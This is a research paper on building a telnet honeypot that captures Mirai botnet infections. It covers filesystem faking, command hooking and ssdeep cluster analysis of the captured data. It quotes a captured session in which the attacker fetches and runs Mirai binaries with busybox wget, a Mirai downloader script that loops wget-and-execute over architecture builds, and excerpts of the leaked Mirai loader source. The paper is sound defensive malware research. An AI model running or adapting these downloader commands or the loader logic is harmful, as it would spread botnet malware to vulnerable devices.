
The telnet honeypot research: review and suggestions for application

genshen.ye

Email: master@zomeye.org

Abstract – This paper presents my research on telnet honeypots. It covers not only techniques for building an efficient telnet honeypot but also methodologies for analysing the data it collects.

Index Terms – Telnet Honeypot, IoT Honeypot, Mirai Botnet, Data Analysis, Cluster Analysis

1. Introduction

Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. User data is interspersed in-band with Telnet control information in an 8-bit byte oriented data connection over the Transmission Control Protocol (TCP). [1]

While Telnet has been around since 1969 and isn’t as widely used as it once was, many embedded devices such as routers, modems, network switches, VoIP phones, DVRs, televisions, industrial control systems and others still rely on its remote access capabilities. In fact, a Shodan report [2] shows that there are still over 7.2 million connected devices globally with an accessible TCP port 23. Figure 1 shows the trend of connections to TCP port 23 on my honeypot.

Figure 1. Connection trend for TCP port 23

At least 40,000 unique IP addresses launch brute-force attacks against my honeypot every month, and most of these IPs belong to embedded and IoT devices. Figure 2 shows the top 20 most probed ports of my honeypot; telnet protocol brute-force attacks (tcp:23 & tcp:2323) account for nearly 27%. So what is happening on the telnet protocol? I use a honeypot to find out.

Figure 2. Top 20 most probed ports

A honeypot is a computer security mechanism set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data (for example, in a network site) that appears to be a legitimate part of the site but is actually isolated and monitored, and that seems to contain information or a resource of value to attackers, who are then blocked. This is similar to the police baiting a criminal, conducting undercover surveillance, and finally punishing the criminal. [3]

2. Build an efficient telnet honeypot

There are many telnet honeypot packages [4], and it is easy to pick one and deploy it with its default settings. Such honeypots do receive some malware payloads, but they only scratch the surface of what is possible. As far as I know, most of them are nearly useless with default settings: they may be low-interaction honeypots, they may only simulate the telnet protocol, and they may support only HTTP as a download method. In short, there is currently no efficient telnet honeypot available publicly.

Hontel [5] is a honeypot for the Telnet service. Basically, it is a Python 2.x application emulating the service inside a chroot environment. Originally it was designed to run inside an Ubuntu environment, though it can easily be adapted to run inside any Linux environment. As far as I know, the Hontel project is a good framework for a telnet honeypot. It provides a “bash” or “busybox” shell, and the attacker can execute any command in the chroot environment and get a real response back. But be careful: malware running inside the hontel honeypot can launch DDoS attacks from it. I have made some improvements based on it and fixed some bugs, as shown below.

  • New features & improvements
    • compatible with Mirai and other botnets;
    • command hooking;
    • simulate IoT devices (random telnet banner, auth);
    • extract more samples from one file;
    • structured data storage based on MySQL;
    • web API system for hontel data transmission;
    • cluster analysis in the hontel honeypot;
  • Bug fixes

It is recommended that you read the source code of the hontel project before reading any further.
Here is an example of Mirai payloads captured by my hontel honeypot.

[2017-03-27 00:20:35 UTC] [59.185.241.2:54660] AUTH: rootzlxx.:enable
[2017-03-27 00:20:36 UTC] [59.185.241.2:54660] CMD: shell
[2017-03-27 00:20:37 UTC] [59.185.241.2:54660] CMD: sh
[2017-03-27 00:20:38 UTC] [59.185.241.2:54660] CMD: /bin/busybox ECCHI
[2017-03-27 00:20:39 UTC] [59.185.241.2:54660] CMD: /bin/busybox ps; /bin/busybox ECCHI
[2017-03-27 00:20:41 UTC] [59.185.241.2:54660] CMD: /bin/busybox cat /proc/mounts; /bin/busybox ECCHI
[2017-03-27 00:20:42 UTC] [59.185.241.2:54660] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
[2017-03-27 00:20:43 UTC] [59.185.241.2:54660] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/home/admin' > /home/admin/.nippon; /bin/busybox cat /home/admin/.nippon; /bin/busybox rm /home/admin/.nippon
[2017-03-27 00:20:44 UTC] [59.185.241.2:54660] CMD: /bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
[2017-03-27 00:20:45 UTC] [59.185.241.2:54660] CMD: /bin/busybox ECCHI
[2017-03-27 00:20:46 UTC] [59.185.241.2:54660] CMD: rm /home/admin/.t; rm /home/admin/.sh; rm /home/admin/.human
[2017-03-27 00:20:47 UTC] [59.185.241.2:54660] CMD: cd /home/admin/
[2017-03-27 00:20:49 UTC] [59.185.241.2:54660] CMD: /bin/busybox cp /bin/echo dvrHelper; >dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2017-03-27 00:20:50 UTC] [59.185.241.2:54660] CMD: /bin/busybox cat /bin/echo
[2017-03-27 00:20:51 UTC] [59.185.241.2:54660] CMD: /bin/busybox ECCHI
[2017-03-27 00:20:52 UTC] [59.185.241.2:54660] CMD: cat /proc/cpuinfo; /bin/busybox ECCHI
[2017-03-27 00:20:53 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
[2017-03-27 00:20:54 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget http://59.185.241.2:80/bins/mirai.arm -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2017-03-27 00:21:21 UTC] [59.185.241.2:54660] CMD: ./dvrHelper telnet.arm; /bin/busybox IHCCE
[2017-03-27 00:21:22 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget; /bin/busybox tftp; /bin/busybox ECCHI
[2017-03-27 00:21:23 UTC] [59.185.241.2:54660] CMD: /bin/busybox wget http://59.185.241.2:80/bins/mirai.arm7 -O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI
[2017-03-27 00:21:48 UTC] [59.185.241.2:54660] CMD: ./dvrHelper telnet.arm7; /bin/busybox IHCCE
[2017-03-27 00:21:49 UTC] [59.185.241.2:54660] CMD: rm -rf upnp; > dvrHelper; /bin/busybox ECCHI

Mirai (Japanese for “the future”, 未来) is malware that turns computer systems running Linux into remotely controlled “bots” that can be used as part of a botnet in large-scale network attacks. It primarily targets online consumer devices such as remote cameras and home routers. The Mirai botnet was first found in August 2016 by MalwareMustDie, a whitehat malware research group, and has been used in some of the largest and most disruptive distributed denial of service (DDoS) attacks, including an attack on 20 September 2016 on computer security journalist Brian Krebs’s web site, an attack on French web host OVH, and the October 2016 Dyn cyberattack. [6]

It is important that a telnet honeypot is compatible with the Mirai botnet, because Mirai payloads currently account for nearly 99% of telnet protocol attacks. (By the way, the Hajime botnet can only attack a fake telnet protocol because of a bug in its telnet scanner.) I have implemented 4 methods in hontel to make it compatible with the Mirai botnet, as shown below.

  1. tolerate the bugs in the Mirai loader;
  2. improve the honeypot filesystem;
  3. command hooking;
  4. extract more samples from one file;

Example 1. auth bugs in the Mirai loader
I have caught 4 types of Mirai authentication bugs, as shown below.

  1. bug in username&password;
  2. bug in username;
  3. bug in password;
  4. no auth;

loader/src/server.c#L287 (no ‘\r\n’ after username or password)[7]

case TELNET_USER_PROMPT:
    consumed = connection_consume_login_prompt(conn);
    if (consumed)
    {
        util_sockprintf(conn->fd, "%s", conn->info.user);
        strcpy(conn->output_buffer.data, "\r\n");
        conn->output_buffer.deadline = time(NULL) + 1;
        conn->state_telnet = TELNET_PASS_PROMPT;
    }
    break;
case TELNET_PASS_PROMPT:
    consumed = connection_consume_password_prompt(conn);
    if (consumed)
    {
        util_sockprintf(conn->fd, "%s", conn->info.pass);
        strcpy(conn->output_buffer.data, "\r\n");
        conn->output_buffer.deadline = time(NULL) + 1;
        conn->state_telnet = TELNET_WAITPASS_PROMPT; // At the very least it will print SOMETHING
    }
    break;

In the leaked Mirai source code, the loader does not send ‘\r\n’ after the username or password when logging in to the telnet device. This produces the username & password bug, which looks like “rootxc3511enable:shell”; the other types are shown in figure 3. In my opinion, this is a trap that the author of the leaked Mirai source code deliberately set. By the way, bad auths make up more than 24% of the 1.2 million attacks my honeypot saw from January to March 2017. Therefore, a telnet honeypot must be able to handle the Mirai auth bugs.

Figure 3. The Mirai auth bugs

Example 2. prompt bug in the Mirai loader
loader/src/connection.c#L213 (“connection_consume_prompt” is defined)[8]

int connection_consume_prompt(struct connection *conn)
{
    char *pch;
    int i, prompt_ending = -1;

    for (i = conn->rdbuf_pos; i >= 0; i--)
    {
        if (conn->rdbuf[i] == ':' || conn->rdbuf[i] == '>' || conn->rdbuf[i] == '$' || conn->rdbuf[i] == '#' || conn->rdbuf[i] == '%')
        {
#ifdef DEBUG
            printf("matched any prompt at %d, \"%c\", \"%s\"\n", i, conn->rdbuf[i], conn->rdbuf);
#endif
            prompt_ending = i;
            break;
        }
    }

    if (prompt_ending == -1)
        return 0;
    else
        return prompt_ending;
}


loader/src/server.c#L307 (“connection_consume_prompt” is called)[9]

case TELNET_WAITPASS_PROMPT:
    if ((consumed = connection_consume_prompt(conn)) > 0)
    {
        util_sockprintf(conn->fd, "enable\r\n");
        util_sockprintf(conn->fd, "shell\r\n");
        util_sockprintf(conn->fd, "sh\r\n");
        conn->state_telnet = TELNET_CHECK_LOGIN;
    }
    break;
case TELNET_CHECK_LOGIN:
    if ((consumed = connection_consume_prompt(conn)) > 0)
    {
        util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
        conn->state_telnet = TELNET_VERIFY_LOGIN;
    }
    break;

The “connection_consume_prompt” function is called during the telnet brute-force attack, and it fails when the prompt character is found at i = 0: prompt_ending is then 0, so the function returns 0, and the caller (which tests for a value > 0) treats that as “no prompt found”.

Example 3. improve the honeypot filesystem
Some files should be prepared for Mirai and other botnets, as shown below.

proc
├── cpuinfo
├── filesystems
├── meminfo
├── modules
├── mounts
├── net
│   └── arp
├── partitions
├── sysrec
├── uptime
├── version
├── vmstat
└── zoneinfo

Feel free to change the content of these files in the honeypot. For example, I deleted some Linux partitions from “/proc/mounts” to increase the scanning speed of Mirai.

It is very cunning that the Mirai loader detects the CPU architecture from the ELF header of “/bin/echo” and pushes a bot sample built for that same architecture. Before the architecture is detected, copying “/bin/echo” is also used to find a writable directory, judged by what the copy returns, as shown below.
loader/src/server.c#L360 (detect CPU arch in Mirai)[10]

case TELNET_COPY_ECHO:
    consumed = connection_consume_copy_op(conn);
    if (consumed)
    {
#ifdef DEBUG
        printf("[FD%d] Finished copying /bin/echo to cwd\n", conn->fd);
#endif
        if (!conn->info.has_arch)
        {
            conn->state_telnet = TELNET_DETECT_ARCH;
            conn->timeout = 120;
            // DO NOT COMBINE THESE
            util_sockprintf(conn->fd, "/bin/busybox cat /bin/echo\r\n");
            util_sockprintf(conn->fd, TOKEN_QUERY "\r\n");
        }
        else
        {
            conn->state_telnet = TELNET_UPLOAD_METHODS;
            conn->timeout = 15;
            util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
        }
    }
    break;
case TELNET_DETECT_ARCH:
    consumed = connection_consume_arch(conn);
    if (consumed)
    {
        conn->timeout = 15;
        if ((conn->bin = binary_get_by_arch(conn->info.arch)) == NULL)
        {
#ifdef DEBUG
            printf("[FD%d] Cannot determine architecture\n", conn->fd);
#endif
            connection_close(conn);
        }
        else if (strcmp(conn->info.arch, "arm") == 0)
        {
#ifdef DEBUG
            printf("[FD%d] Determining ARM sub-type\n", conn->fd);
#endif
            util_sockprintf(conn->fd, "cat /proc/cpuinfo; " TOKEN_QUERY "\r\n");
            conn->state_telnet = TELNET_ARM_SUBTYPE;
        }
        else
        {
#ifdef DEBUG
            printf("[FD%d] Detected architecture: '%s'\n", ev->data.fd, conn->info.arch);
#endif
            util_sockprintf(conn->fd, "/bin/busybox wget; /bin/busybox tftp; " TOKEN_QUERY "\r\n");
            conn->state_telnet = TELNET_UPLOAD_METHODS;
        }
    }
    break;

I intercept the “cat /bin/echo” command sent by Mirai and return a fake echo file to it. Mirai then detects an ARM architecture instead of x86 in my honeypot. This is also the basis of command hooking.
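The following is an added example of the honeypot side of this trick; it is not hontel’s or Mirai’s code. It builds a minimal ELF32 header for a chosen architecture (the kind of content a hooked “cat /bin/echo” can return) and decodes the architecture from such a header the way a header-only probe does: EI_DATA for endianness, e_machine for the CPU. The e_machine constants are the standard ELF values; which suffix name the real loader assigns to each machine is an assumption of this example, restricted to the suffix names listed later on this page.

```python
import struct

ELFCLASS32 = 1
ELFDATA2LSB, ELFDATA2MSB = 1, 2
# Standard ELF e_machine values
EM_SPARC, EM_386, EM_68K, EM_MIPS, EM_PPC, EM_ARM, EM_SH = 0x02, 0x03, 0x04, 0x08, 0x14, 0x28, 0x2A

# (e_machine, big_endian) -> sample suffix used on this page. Assumption of this
# example: the loader's own name choice lives in connection_consume_arch().
ARCH_TABLE = {
    (EM_ARM, False): "arm",
    (EM_MIPS, True): "mips",
    (EM_MIPS, False): "mpsl",
    (EM_PPC, True): "ppc",
    (EM_SH, False): "sh4",
    (EM_SPARC, True): "spc",
    (EM_386, False): "x86",
    (EM_68K, True): "m68k",
}
MACHINE_FOR = {name: key for key, name in ARCH_TABLE.items()}


def build_elf32_header(arch):
    """Return a 52-byte ELF32 header that claims to be an executable for `arch`.
    Serving this as the first bytes of /bin/echo satisfies a header-only probe."""
    machine, big = MACHINE_FOR[arch]
    # e_ident: magic, EI_CLASS, EI_DATA, EI_VERSION=1, EI_OSABI=0, EI_ABIVERSION=0, 7 pad bytes
    e_ident = b"\x7fELF" + bytes([ELFCLASS32, ELFDATA2MSB if big else ELFDATA2LSB, 1, 0, 0]) + b"\x00" * 7
    endian = ">" if big else "<"
    # e_type=ET_EXEC(2), e_machine, e_version=1, e_entry, e_phoff, e_shoff,
    # e_flags, e_ehsize=52, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    return e_ident + struct.pack(endian + "HHIIIIIHHHHHH", 2, machine, 1, 0, 0, 0, 0, 52, 0, 0, 0, 0, 0)


def detect_arch(blob):
    """Arch name read from an ELF header, or None for non-ELF data or an unknown machine."""
    if len(blob) < 20 or blob[:4] != b"\x7fELF":
        return None
    big = blob[5] == ELFDATA2MSB
    (e_machine,) = struct.unpack_from((">" if big else "<") + "H", blob, 18)
    return ARCH_TABLE.get((e_machine, big))


def fake_echo_response(arch="arm"):
    """What the honeypot replies to a hooked 'cat /bin/echo': the forged header
    followed by padding so the output looks like the dump of a small binary."""
    return build_elf32_header(arch) + b"\x00" * 64


def honeypot_advertises(arch="arm"):
    """Sanity check: the architecture a probe would conclude from the fake /bin/echo."""
    return detect_arch(fake_echo_response(arch))


if __name__ == "__main__":
    print("fake /bin/echo advertises:", honeypot_advertises("arm"))
```

Note that a real /bin/echo on a 64-bit x86 honeypot host is an ELF64 binary with an e_machine the table does not list, so the probe would conclude nothing from it; serving the forged 32-bit ARM header is what makes the loader push an ARM sample.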

Example 4. command hooking
I have found 2 methods of command hooking:

  1. replace the input command;
  2. replace the ELF file;

I replace input commands such as “./” with another string and reply with a fake response to the attacker.

if './' in raw:
    try:
        # rewrite the raw line and the parsed command so the dropped binary is never executed
        raw = raw.replace('./', 'fake_exec')
        cmd = cmd.replace('./', 'fake_exec')
        # str.replace returns a new string; rebuild the list instead of discarding the result
        params = [param.replace('./', 'fake_exec') for param in params]
    except Exception as e:
        print(e)

I rename ‘/bin/rm’ in the chroot environment to ‘/bin/rm2’, so the rm command no longer works. You can add other hooking rules as you wish. Note that commands without a specific hooking rule are free to execute.
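Here is an added example (not hontel’s code) of a small rule-based hooking layer that covers both hooking methods described above. Each rule rewrites the raw input line before it reaches the chroot shell; the raw line is kept untouched for logging. It assumes a /bin/fake_exec program exists in the chroot that prints a canned response, and that /bin/rm has been renamed to /bin/rm2 as described, so the rewritten “rm” never deletes anything; both are assumptions of this example.

```python
import re

# Hooking rules: (name, pattern, replacement). Patterns only match at the start
# of the line or right after a command separator, so "dvrHelper" is not touched
# by the rm rule and "cat ./file" is not touched by the exec rule.
# Assumptions of this example: /bin/fake_exec exists in the chroot and prints a
# canned response; /bin/rm was renamed to /bin/rm2, so "rm2" is what rm becomes.
HOOKS = [
    ("exec", re.compile(r"(^|[;&|]\s*)\./"), r"\g<1>fake_exec "),
    ("rm", re.compile(r"(^|[;&|]\s*)(?:/bin/busybox\s+)?rm(?=\s|$)"), r"\g<1>rm2"),
]


def apply_hooks(raw):
    """Return (command the shell will actually run, names of the rules that fired)."""
    cmd, fired = raw, []
    for name, pattern, repl in HOOKS:
        cmd, count = pattern.subn(repl, cmd)
        if count:
            fired.append(name)
    return cmd, fired


def handle_input(raw):
    """One record per CMD line: the raw input is stored untouched (that is what
    the data analysis needs), the rewritten form is what gets executed."""
    run, fired = apply_hooks(raw)
    return {"input": raw, "run": run, "hooks": fired}


if __name__ == "__main__":
    # Constructed inputs modelled on the Mirai session shown earlier on this page
    for line in ("./dvrHelper telnet.arm; /bin/busybox IHCCE",
                 "rm /home/admin/.t; rm /home/admin/.sh",
                 "/bin/busybox cp /bin/echo dvrHelper; >dvrHelper"):
        print(handle_input(line))
```

Commands that match no rule pass through unchanged, which keeps the rest of the loader’s sequence (the writability probe, the architecture check, the wget/tftp check) working against the real busybox in the chroot.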

Example 5. extract more samples from a shell script
A shell script is often used to download malware, as shown below.

#!/bin/sh

# Edit
WEBSERVER="46.166.185.159:80"
# Stop editing now

BINARIES="mirai.arm mirai.m68k mirai.mips mirai.mpsl mirai.ppc mirai.sh4 mirai.x86 mirai.spc"

for Binary in $BINARIES; do
    wget http://$WEBSERVER/$Binary -O dvrHelper
    chmod 777 dvrHelper
    ./dvrHelper
done

rm -f *

Other commands are also used to spread malware:
wget
curl
ftp
tftp
nc
echo

I install these commands in the chroot environment and let the shell script execute freely.

Example 6. extract more samples from one Mirai file
I combine the prefix of a Mirai file name with the different CPU architectures to form new file names, and obtain more Mirai samples that way. For example, a Mirai file named “mirai.arm” (figure 4) has the prefix “mirai” and the architecture “arm”, so I can also obtain “mirai.x86”. Mirai supports 10 CPU architectures, and I have seen 12 Mirai prefixes, as shown below.

Suffix Example: "arm", "arm5n", "arm7", "m68k", "mips", "mpsl", "ppc", "sh4", "spc", "x86"
Prefix Example: "mirai.", "telnetd.", "busybox.", "usb_bus.", "ntpd.", "mm.", "dlr.", "helper.", "masuta.", "miraint.", "gnome.", "tveth."


Figure 4. Mirai samples
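As an added example for Examples 5 and 6 (not hontel’s code), the block below recovers the download URLs a downloader script like the one above would request, by tracking simple VAR="value" assignments and for-in loops, and then expands one sample name into the whole architecture family using the suffix list from Example 6. The script parser handles only the forms shown on this page, not general shell; the sample script and host address are constructed for the example.

```python
import re

# Arch suffixes listed in Example 6
SUFFIXES = ["arm", "arm5n", "arm7", "m68k", "mips", "mpsl", "ppc", "sh4", "spc", "x86"]

ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)=["\']?([^"\']*?)["\']?\s*$')
FOR_RE = re.compile(r'^\s*for\s+(\w+)\s+in\s+(.*?)\s*;\s*do\s*$')
FETCH_RE = re.compile(r'\b(?:wget|curl)\b.*?((?:https?|ftp)://[^\s;|&>]+)')
VAR_RE = re.compile(r'\$\{?(\w+)\}?')


def expand(text, env):
    """Substitute $VAR / ${VAR} from env; names not in env are left as written."""
    return VAR_RE.sub(lambda m: env.get(m.group(1), m.group(0)), text)


def urls_from_script(script):
    """Walk a downloader script line by line, following assignments and for-in
    loops, and return every download URL it would request, in order, deduplicated."""
    env, loops, urls = {}, [], []
    for line in script.splitlines():
        if line.strip() == "done" and loops:
            loops.pop()
            continue
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = expand(m.group(2), env)
            continue
        m = FOR_RE.match(line)
        if m:
            loops.append((m.group(1), expand(m.group(2), env).split()))
            continue
        m = FETCH_RE.search(line)
        if m:
            candidates = [m.group(1)]
            for var, values in loops:  # enumerate every loop iteration in scope
                candidates = [expand(c, {var: v}) for c in candidates for v in values]
            for url in (expand(c, env) for c in candidates):
                if url not in urls:
                    urls.append(url)
    return urls


def sibling_samples(url, suffixes=SUFFIXES):
    """From one sample URL such as .../bins/mirai.arm, derive the URLs that use the
    same prefix with every known arch suffix (the Example 6 expansion)."""
    head, slash, name = url.rpartition("/")
    prefix, dot, suffix = name.rpartition(".")
    if not slash or not dot or suffix not in suffixes:
        return []
    return ["{}/{}.{}".format(head, prefix, s) for s in suffixes]


# Constructed sample modelled on the downloader script above; the host is a
# documentation address, not a real server.
SAMPLE_SCRIPT = """\
#!/bin/sh
WEBSERVER="203.0.113.10:80"
BINARIES="mirai.arm mirai.m68k mirai.mips mirai.mpsl mirai.ppc mirai.sh4 mirai.x86 mirai.spc"

for Binary in $BINARIES; do
wget http://$WEBSERVER/$Binary -O dvrHelper
chmod 777 dvrHelper
./dvrHelper
done

rm -f *
"""

if __name__ == "__main__":
    for u in urls_from_script(SAMPLE_SCRIPT):
        print(u)
    print(sibling_samples("http://203.0.113.5:80/bins/mirai.arm"))
```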

3. Data analysis in telnet honeypot

1. Structured honeypot data storage for the hontel honeypot based on MySQL
Translate the honeypot data into structured data and store it in a MySQL database.

mysql> show tables;
+---------------------------+
| Tables_in_honeypot_hontel |
+---------------------------+
| auth                      |
| downloads                 |
| input                     |
| payload_hash              |
| sensors                   |
| sessions                  |
| ssdeep_cluster            |
| ssdeep_cluster_daily      |
+---------------------------+
8 rows in set (0.00 sec)

mysql> desc auth;
+-----------+--------------+------+-----+---------+----------------+
| Field     | Type         | Null | Key | Default | Extra          |
+-----------+--------------+------+-----+---------+----------------+
| id        | int(11)      | NO   | PRI | NULL    | auto_increment |
| timestamp | datetime     | YES  | MUL | NULL    |                |
| session   | char(32)     | YES  |     | NULL    |                |
| username  | varchar(100) | YES  |     | NULL    |                |
| password  | varchar(100) | YES  |     | NULL    |                |
| success   | tinyint(1)   | YES  | MUL | NULL    |                |
+-----------+--------------+------+-----+---------+----------------+
6 rows in set (0.01 sec)

mysql> desc downloads;
+-----------+----------+------+-----+---------+----------------+
| Field     | Type     | Null | Key | Default | Extra          |
+-----------+----------+------+-----+---------+----------------+
| id        | int(11)  | NO   | PRI | NULL    | auto_increment |
| session   | char(32) | YES  | MUL | NULL    |                |
| timestamp | datetime | YES  |     | NULL    |                |
| url       | text     | YES  |     | NULL    |                |
| md5       | char(32) | YES  | MUL | NULL    |                |
| sha256    | char(64) | YES  |     | NULL    |                |
+-----------+----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)

mysql> desc input;
+-----------+----------+------+-----+---------+----------------+
| Field     | Type     | Null | Key | Default | Extra          |
+-----------+----------+------+-----+---------+----------------+
| id        | int(11)  | NO   | PRI | NULL    | auto_increment |
| session   | char(32) | YES  | MUL | NULL    |                |
| timestamp | datetime | YES  |     | NULL    |                |
| input     | text     | YES  |     | NULL    |                |
+-----------+----------+------+-----+---------+----------------+
4 rows in set (0.00 sec)

mysql> desc sensors;
+---------------+----------+------+-----+---------+----------------+
| Field         | Type     | Null | Key | Default | Extra          |
+---------------+----------+------+-----+---------+----------------+
| id            | int(11)  | NO   | PRI | NULL    | auto_increment |
| gmt_create    | datetime | YES  |     | NULL    |                |
| gmt_modify    | datetime | YES  |     | NULL    |                |
| sensor_ip     | char(16) | YES  |     | NULL    |                |
| sensor_port   | int(6)   | YES  |     | NULL    |                |
| restart_count | int(11)  | YES  |     | NULL    |                |
+---------------+----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)

mysql> desc sessions;
+-----------+----------+------+-----+---------+----------------+
| Field     | Type     | Null | Key | Default | Extra          |
+-----------+----------+------+-----+---------+----------------+
| id        | int(32)  | NO   | PRI | NULL    | auto_increment |
| timestamp | datetime | YES  | MUL | NULL    |                |
| session   | char(32) | YES  | MUL | NULL    |                |
| starttime | char(30) | YES  |     | NULL    |                |
| endtime   | char(30) | YES  |     | NULL    |                |
| dst_ip    | char(16) | YES  |     | NULL    |                |
| dst_port  | int(6)   | YES  |     | NULL    |                |
| src_ip    | char(16) | YES  |     | NULL    |                |
| src_port  | int(6)   | YES  |     | NULL    |                |
| cmd_count | int(11)  | YES  |     | NULL    |                |
+-----------+----------+------+-----+---------+----------------+
10 rows in set (0.00 sec)


2. Index the data in these entities by session
Define the total payload (all requests) of one TCP connection of a telnet brute-force attack as an attack session, and index the data in these entities by storing the sessions in a separate MySQL table.

Figure 5. Packet exchange for TCP connection.


3. Compute payload hashes for every session using ssdeep and md5
Ssdeep is a program for computing context triggered piecewise hashes (CTPH). Also called fuzzy hashes, CTPH can match inputs that have homologies. Such inputs have sequences of identical bytes in the same order, although bytes in between these sequences may be different in both content and length.[11]

mysql> desc payload_hash;
+----------------+-----------+------+-----+---------+----------------+
| Field          | Type      | Null | Key | Default | Extra          |
+----------------+-----------+------+-----+---------+----------------+
| id             | int(11)   | NO   | PRI | NULL    | auto_increment |
| timestamp      | datetime  | YES  | MUL | NULL    |                |
| session        | char(32)  | YES  | MUL | NULL    |                |
| payload_md5    | char(32)  | YES  |     | NULL    |                |
| payload_ssdeep | char(128) | YES  | MUL | NULL    |                |
+----------------+-----------+------+-----+---------+----------------+
5 rows in set (0.00 sec)


4. Web API system for hontel data transmission
Example:

Method  HTTP request          Parameters
POST    /report_auth          session, timestamp, success, username, password
POST    /report_download      session, timestamp, url, md5, sha256
POST    /report_input         session, timestamp, input
POST    /report_payload_hash  session, timestamp, payload_md5, payload_ssdeep
POST    /report_sessions      session, timestamp, starttime, dst_ip, dst_port, src_ip, src_port
POST    /update_sessions      session, timestamp, endtime, cmd_count
POST    /report_sensors       sensor_ip, sensor_port


5. Use ssdc to cluster payload_ssdeep
Ssdc [12] is a command-line tool that clusters files based on their ssdeep hashes.

mysql> desc ssdeep_cluster;
+---------------+-----------+------+-----+---------+----------------+
| Field         | Type      | Null | Key | Default | Extra          |
+---------------+-----------+------+-----+---------+----------------+
| id            | int(11)   | NO   | PRI | NULL    | auto_increment |
| timestamp     | datetime  | NO   |     | NULL    |                |
| analysis_date | char(8)   | YES  | MUL | NULL    |                |
| ssdeep        | char(128) | NO   |     | NULL    |                |
| group         | int(5)    | NO   |     | NULL    |                |
| score         | int(5)    | NO   | MUL | NULL    |                |
+---------------+-----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)

mysql> desc ssdeep_cluster_daily;
+---------------+-----------+------+-----+---------+----------------+
| Field         | Type      | Null | Key | Default | Extra          |
+---------------+-----------+------+-----+---------+----------------+
| id            | int(11)   | NO   | PRI | NULL    | auto_increment |
| timestamp     | datetime  | NO   |     | NULL    |                |
| analysis_date | char(8)   | YES  | MUL | NULL    |                |
| ssdeep        | char(128) | NO   |     | NULL    |                |
| group         | int(5)    | NO   |     | NULL    |                |
| score         | int(5)    | NO   | MUL | NULL    |                |
+---------------+-----------+------+-----+---------+----------------+
6 rows in set (0.00 sec)


6. Use D3.js to draw force-directed graphs from honeypot data
D3.js is a JavaScript library for manipulating documents based on data. [13]

Figure 6. Demo of cluster analysis in hontel.


7. Automatic analysis of payload variants in hontel
Every day tens of thousands of sessions come from attackers, and most of them belong to the Mirai botnet. There are also many variants of Mirai and of other botnets. ssdeep is a good way to measure the difference between two payloads: I keep a list of the previous ssdeep hashes and compare each new ssdeep hash against it. The similarity of the two hashes reveals variants of a payload.

4. THE END

I’d like to share my personal ideas based on nearly one year of honeypot research, and I would welcome further exchange or cooperation with you. Please feel free to contact me; my contact details are shown below.

# Github/Twitter: @zom3y3
# Blog: https://blog.findmalware.org
# Email: zom3y3@gmail.com

5. REFERENCES

[1] https://en.wikipedia.org/wiki/Telnet
[2] https://www.shodan.io/report/muH5Gsxg
[3] https://en.wikipedia.org/wiki/Honeypot_(computing)
[4] https://github.com/search?utf8=%E2%9C%93&q=telnet+honeypot&type=
[5] https://github.com/stamparm/hontel
[6] https://en.wikipedia.org/wiki/Mirai_(malware)
[7] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/server.c#L287
[8] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/connection.c#L213
[9] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/server.c#L307
[10] https://github.com/jgamblin/Mirai-Source-Code/blob/master/loader/src/server.c#L360
[11] http://ssdeep.sourceforge.net/
[12] https://www.virusbulletin.com/virusbulletin/2015/11/optimizing-ssdeep-use-scale/
[13] https://d3js.org/
